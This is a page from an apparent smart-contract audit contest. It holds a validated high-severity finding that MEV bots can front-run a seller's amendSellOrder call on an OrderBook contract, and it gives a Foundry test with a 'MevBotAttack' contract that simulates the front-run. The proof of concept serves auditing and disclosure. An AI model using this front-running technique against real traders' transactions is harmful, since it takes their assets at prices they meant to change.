OrderBook

First Flight #43

Beginner FriendlySolidity

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

🛡️ MEV Bots can front-run the transaction to buy the assets at lower cost, When seller calls `OrderBook::amendSellOrder`

yashkhare9815

MEV Bots can front-run the transaction to buy the assets at lower cost,When seller calls `OrderBook::amendSellOrder`

Description

Normally a seller can amend some changes to his existing sell orders to increase or decrease the price of the assets or the quantity, But due to presence of the mev bots that scans the mempool where transaction are stored temporary before execution, they can front-run the amend transaction and buy the order(assets) at old (lower) price, Resulting in seller not able to amend the order and sold out of order at old price

Risk

Likelihood:

Reason 1 : Whenever a seller calls the amendSellOrder function and increase the price of the assets.

Impact:

Impact 1: Seller not able to modify the order.
Impact 2:Order sold at lower price than what was wanted by the seller.

Proof of Concept

Add MevBotAttack contract and test_MevAttackOnSellerAmend to yout TestOrderBook.t.sol file .

//@audit add following MevBotContract in TestOrderBook.t.sol

contract MevBotAttack is Test {

OrderBook public book;

address public usdcHolder;

constructor(OrderBook _book) {

book = _book;

}

function mevBuyOrderInMempool(uint256 orderId) external {

// simulate mempool bot that front-runs amend by buying before it

book.iUSDC().approve(address(book), type(uint256).max);

book.buyOrder(orderId);

}

//@audit add below test in test suit

function test_MevAttackOnSellerAmend() public {

// Step 1: Alice creates a sell order (original price)

vm.startPrank(alice);

wbtc.approve(address(book), 2e8);

uint256 orderId = book.createSellOrder(

address(wbtc),

2e8,

180_000e6,

2 days

);

vm.stopPrank();

// Step 2: Fund MEV bot with Dan's USDC

MevBotAttack mevBot = new MevBotAttack(book);

vm.startPrank(dan);

usdc.transfer(address(mevBot), 200_000e6);

vm.stopPrank();

// From the mempool, bot will know a transaction for amending the price is taking place.

// It will front-run and buy the order at old price before the amendment happens.

// Step 3: MEV bot front-runs and buys the order

mevBot.mevBuyOrderInMempool(orderId);

// Step 4: Alice tries to amend the sell order (e.g., higher price)

vm.expectRevert(OrderBook.OrderAlreadyInactive.selector); // your amend logic should revert this

vm.prank(alice);

book.amendSellOrder(orderId, 2e8, 200_000e6, 1 days);

// Step 5: Assert post-conditions

assert(wbtc.balanceOf(address(mevBot)) == 2e8); // dan owns the asset

assert(usdc.balanceOf(alice) == 174_600e6); // alice got paid old price - 3% fee

assert(book.totalFees() == 5_400e6); // 3% of 180,000

}

Recommended Mitigation

Use safe rpc api endpoints like FlashBot rpc to make your transaction invisible from the mev bots.

Updates

Lead Judging Commences

yeahchibyke Lead Judge 10 days ago

Submission Judgement Published

Validated

Assigned finding tags:

Amends or cancellation of sell orders can be front-run

When a seller wants to amend or cancel their sell orders, a malicious entity can front-run their transactions and buy out the orders. This can be especially harmful when real-world prices of listed assets fluctuate and sellers want to adjust the prices listed in their orders.

Rewards breakdown

nSLOC

217

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.